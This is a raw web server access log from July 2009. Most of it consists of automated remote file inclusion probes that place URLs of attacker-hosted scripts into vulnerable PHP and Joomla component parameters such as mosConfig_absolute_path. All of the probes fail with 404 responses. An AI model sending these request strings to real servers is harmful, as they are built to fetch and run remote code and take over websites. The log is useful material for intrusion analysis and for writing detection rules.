74.6.22.169 - - [26/Jul/2009:05:42:06 -0400] "GET /logs/error_log.Q109061200 HTTP/1.0" 200 3584078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.221.130.13 - - [26/Jul/2009:05:42:25 -0400] "GET /logs/access_log.Q109060100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
77.221.130.13 - - [26/Jul/2009:05:42:25 -0400] "GET /logs/access_log.Q109070900//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
77.221.130.13 - - [26/Jul/2009:05:42:25 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
77.221.130.13 - - [26/Jul/2009:05:42:25 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.221.130.8 - - [26/Jul/2009:05:42:37 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.221.130.8 - - [26/Jul/2009:05:42:37 -0400] "GET /logs/access_log.Q109060100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
77.221.130.8 - - [26/Jul/2009:05:42:37 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
77.221.130.8 - - [26/Jul/2009:05:42:43 -0400] "GET /logs/access_log.Q109070900//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:05:43:00 -0400] "GET /index.php?redir=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:05:43:00 -0400] "GET /logs/index.php?redir=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:05:43:00 -0400] "GET /logs/access_log.Q109070200%20%20/index.php?redir=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.38.18.31 - - [26/Jul/2009:05:43:28 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.badranland.com//components/com_fabrik/libs/Blowfish/idxx.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
218.38.18.31 - - [26/Jul/2009:05:43:28 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.badranland.com//components/com_fabrik/libs/Blowfish/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.38.18.31 - - [26/Jul/2009:05:43:28 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://www.badranland.com//components/com_fabrik/libs/Blowfish/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:05:43:46 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:05:43:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.18.31 - - [26/Jul/2009:05:43:48 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://www.badranland.com//components/com_fabrik/libs/Blowfish/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.38.18.31 - - [26/Jul/2009:05:43:54 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.badranland.com//components/com_fabrik/libs/Blowfish/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.38.18.31 - - [26/Jul/2009:05:43:54 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.badranland.com//components/com_fabrik/libs/Blowfish/idxx.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
218.38.18.31 - - [26/Jul/2009:05:43:54 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://www.badranland.com//components/com_fabrik/libs/Blowfish/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.38.18.31 - - [26/Jul/2009:05:44:18 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://www.badranland.com//components/com_fabrik/libs/Blowfish/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
141.223.5.12 - - [26/Jul/2009:05:44:55 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.hair.gr/aldiid.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
87.20.186.139 - - [26/Jul/2009:05:44:56 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?redir=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.221.130.13 - - [26/Jul/2009:05:44:58 -0400] "GET /logs/access_log.Q109070900%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
77.221.130.13 - - [26/Jul/2009:05:44:58 -0400] "GET /logs/access_log.Q109060100%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
77.221.130.8 - - [26/Jul/2009:05:45:00 -0400] "GET /logs/access_log.Q109060100%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
77.221.130.8 - - [26/Jul/2009:05:45:00 -0400] "GET /logs/access_log.Q109070900%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.172.33.230 - - [26/Jul/2009:05:46:38 -0400] "GET /logs/access_log.Q109071200//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
208.113.167.8 - - [26/Jul/2009:05:46:42 -0400] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:05:46:42 -0400] "GET /logs/access_log.Q109062900/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 280 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:05:46:42 -0400] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
209.172.33.230 - - [26/Jul/2009:05:46:47 -0400] "GET /logs/access_log.Q109060300//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.bu.ac.th/en/hotnews/baner.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:05:47:02 -0400] "GET /images/_notes/home_welcome_bkgrd.gif.mno HTTP/1.1" 200 249 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.113.167.8 - - [26/Jul/2009:05:47:10 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 280 "-" "libwww-perl/5.803"
66.249.68.247 - - [26/Jul/2009:05:50:26 -0400] "GET /images/over-index5_mcrnedlhol.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
69.13.208.131 - - [26/Jul/2009:05:50:37 -0400] "GET //main.php?sayfa=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
202.191.43.177 - - [26/Jul/2009:05:51:36 -0400] "GET /article/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
208.113.167.8 - - [26/Jul/2009:05:52:00 -0400] "GET /logs/access_log.Q109060500/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 268 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:05:52:00 -0400] "GET /plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
208.113.167.8 - - [26/Jul/2009:05:52:00 -0400] "GET /logs/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://tikihub.com/ray/idd.swf??? HTTP/1.1" 404 246 "-" "libwww-perl/5.803"
66.249.68.247 - - [26/Jul/2009:05:53:38 -0400] "GET /images/_notes/contact_phone_over.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
110.45.138.139 - - [26/Jul/2009:05:53:49 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
110.45.138.139 - - [26/Jul/2009:05:53:49 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
110.45.138.139 - - [26/Jul/2009:05:53:49 -0400] "GET /logs/access_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
220.231.126.252 - - [26/Jul/2009:05:54:54 -0400] "GET /logs/access_log.Q109060600%20%20////?DOCUMENT_ROOT=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
110.45.138.139 - - [26/Jul/2009:05:55:25 -0400] "GET /logs/access_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:05:56:02 -0400] "GET /logs/access_log.Q109070200/index.php?redir=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:05:56:05 -0400] "GET /logs/access_log.Q109060900/index.php?redir=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:05:57:32 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:06:00:12 -0400] "GET /images/_notes/store_anim_r2_c1_f7.gif.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.20.186.139 - - [26/Jul/2009:06:00:37 -0400] "GET //appserv/main.php?appserv_root=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:00:37 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:00:37 -0400] "GET /logs/access_log.Q109050700//appserv/main.php?appserv_root=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:01:29 -0400] "GET /logs/access_log.Q109061900//appserv/main.php?appserv_root=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
87.106.34.122 - - [26/Jul/2009:06:02:26 -0400] "GET /logs/access_log.Q109062800//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
87.106.34.122 - - [26/Jul/2009:06:02:26 -0400] "GET //components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
87.106.34.122 - - [26/Jul/2009:06:02:27 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
69.13.208.131 - - [26/Jul/2009:06:02:33 -0400] "GET /logs/access_log.Q109062800//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
69.13.208.131 - - [26/Jul/2009:06:02:33 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
69.13.208.131 - - [26/Jul/2009:06:02:33 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 278 "-" "libwww-perl/5.805"
77.221.130.14 - - [26/Jul/2009:06:02:38 -0400] "GET /logs/access_log.Q109062800//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
77.221.130.14 - - [26/Jul/2009:06:02:39 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
77.221.130.14 - - [26/Jul/2009:06:02:39 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 278 "-" "libwww-perl/5.805"
87.106.34.122 - - [26/Jul/2009:06:03:07 -0400] "GET //components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
69.13.208.131 - - [26/Jul/2009:06:03:22 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
87.20.186.139 - - [26/Jul/2009:06:03:34 -0400] "GET /logs/access_log.Q109050700%20%20//appserv/main.php?appserv_root=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:06:03:36 -0400] "GET /logs/access_log.Q109061900%20%20//appserv/main.php?appserv_root=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.13.208.131 - - [26/Jul/2009:06:03:36 -0400] "GET /logs/access_log.Q109060300//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
87.106.34.122 - - [26/Jul/2009:06:03:44 -0400] "GET /logs/access_log.Q109060300//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
77.221.130.14 - - [26/Jul/2009:06:03:46 -0400] "GET /logs/access_log.Q109060300//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
77.221.130.14 - - [26/Jul/2009:06:04:29 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
66.249.68.247 - - [26/Jul/2009:06:04:38 -0400] "GET /logs/error_log.Q108081700 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.140.20.212 - - [26/Jul/2009:06:06:34 -0400] "GET /logs/access_log.Q109071500/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://box.dmon.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
213.140.20.212 - - [26/Jul/2009:06:06:34 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://box.dmon.com/id.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.76"
122.99.196.136 - - [26/Jul/2009:06:06:39 -0400] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
122.99.196.136 - - [26/Jul/2009:06:06:39 -0400] "GET /logs/access_log.Q109060400%20%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
122.99.196.136 - - [26/Jul/2009:06:06:39 -0400] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
213.140.20.212 - - [26/Jul/2009:06:06:44 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://box.dmon.com/id.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.76"
66.249.68.247 - - [26/Jul/2009:06:06:47 -0400] "GET /images/_notes/nav_store_ckout_orng.jpg.mno HTTP/1.1" 200 247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [26/Jul/2009:06:06:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.0.146.100 - - [26/Jul/2009:06:07:06 -0400] "GET /logs/access_log.Q109060400%20%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
124.0.146.100 - - [26/Jul/2009:06:07:06 -0400] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
124.0.146.100 - - [26/Jul/2009:06:07:06 -0400] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:06:07:06 -0400] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:06:07:06 -0400] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
115.88.240.91 - - [26/Jul/2009:06:07:07 -0400] "GET /logs/access_log.Q109060400%20%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
91.191.35.118 - - [26/Jul/2009:06:07:22 -0400] "GET /logs/access_log.Q109070800%20%20//png.php?include_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.140.20.212 - - [26/Jul/2009:06:07:26 -0400] "GET /logs/error_log.Q109053000/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://box.dmon.com/id.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.76"
87.106.210.178 - - [26/Jul/2009:06:09:01 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:06:09:01 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:06:09:01 -0400] "GET /logs/access_log.Q109062000//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:06:09:11 -0400] "GET /logs/error_log.Q109062000//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:06:09:47 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:06:09:47 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:06:09:52 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:06:09:52 -0400] "GET /logs/access_log.Q109060300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
91.191.35.118 - - [26/Jul/2009:06:10:23 -0400] "GET /logs/access_log.Q109053000%20%20//png.php?include_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.140.20.212 - - [26/Jul/2009:06:10:39 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://box.dmon.com/id.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.76"
87.106.210.178 - - [26/Jul/2009:06:10:41 -0400] "GET /logs/access_log.Q109062000%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:06:10:41 -0400] "GET /logs/error_log.Q109062000%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:06:11:03 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:06:11:03 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:06:11:04 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:06:11:04 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:06:11:04 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:06:11:04 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:06:11:18 -0400] "GET /logs/access_log.Q109060300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:06:11:20 -0400] "GET /logs/access_log.Q109060300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:06:11:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.210.178 - - [26/Jul/2009:06:12:13 -0400] "GET /logs/access_log.Q109051300%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:06:12:13 -0400] "GET /logs/access_log.Q109060300%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
69.13.208.131 - - [26/Jul/2009:06:12:17 -0400] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
69.13.208.131 - - [26/Jul/2009:06:12:17 -0400] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
69.13.208.131 - - [26/Jul/2009:06:12:17 -0400] "GET /logs/access_log.Q109061700%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pacificbiosciences.com//assets/snippets/reflect/fx29id1.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
